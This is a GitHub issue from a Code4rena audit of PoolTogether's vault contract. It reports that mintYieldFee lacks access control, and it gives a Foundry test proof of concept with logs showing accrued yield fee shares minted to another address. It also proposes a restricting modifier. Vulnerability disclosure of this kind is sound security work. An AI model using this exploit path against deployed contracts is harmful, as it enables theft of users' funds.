search

code-423n4 / 2023-07-pooltogether-findings

12 stars 7 forks source link

Missing access control in mintYieldFee allowing everybody to mint the available YieldFee to himself #403

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/GenerationSoftware/pt-v5-vault/blob/b1deb5d494c25f885c34c83f014c8a855c5e2749/src/Vault.sol#L394-L402

Vulnerability details

Impact

Everybody can call the mintYieldFee function in the Vault, when there is _yieldFeeTotalSupply available and mint shares to himself for free, which latter results in stealing funds form the Vault. (if this is a desired behavior, which it shouldn't based on the docs, the function can still be frontrun, and result in a malicious actor minting shares for free)

Proof of Concept

Everybody can call the mintYieldFee function in the Vault, when there is _yieldFeeTotalSupply which is increased in the liquidate function at https://github.com/GenerationSoftware/pt-v5-vault/blob/b1deb5d494c25f885c34c83f014c8a855c5e2749/src/Vault.sol#L550-L587. The liquidator is out of scope for this contest, this is why the _yieldFeeTotalSupply was increased manually. Example: After executing liquidate we have _yieldFeeTotalSupply = 5 * 1e9;

function testMintYieldFee() public {
    vault.setYieldFeeRecipient(alice);
    // vault._increaseYieldFeeBalance(5 * 1e9); <== simulates the result of liquidate function call

    vm.startPrank(alice);
    console.log('Balance of bob before: ', vault.balanceOf(bob));
    console.log('Yield fee total supply: ', vault.yieldFeeTotalSupply());
    console.log('Yield Fee Recipient: ', vault.yieldFeeRecipient());
    console.log('Bob address: ', bob);
    vault.mintYieldFee(5000000000, bob);
    console.log('Yield fee total after: ', vault.yieldFeeTotalSupply());
    console.log('Balance of bob after: ', vault.balanceOf(bob));
    console.log('Balance of alice after: ', vault.balanceOf(alice));
    vm.stopPrank();
  }

The result will be: 

Logs:
  Balance of bob before:  0
  Yield fee total supply:  5000000000
  Yield Fee Recipient:  0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea
  Bob address:  0x4dBa461cA9342F4A6Cf942aBd7eacf8AE259108C
  Yield fee total after:  0
  Balance of bob after:  5000000000
  Balance of alice after:  0

Tools Used

Manual Review

Recommended Mitigation Steps

Add a modifier in the mintYieldFee function that requires the caller or the receiver to be the yieldFeeReceipient_

Assessed type

Access Control

c4-judge commented 1 year ago

Picodes marked the issue as duplicate of #406

c4-judge commented 11 months ago

Picodes marked the issue as satisfactory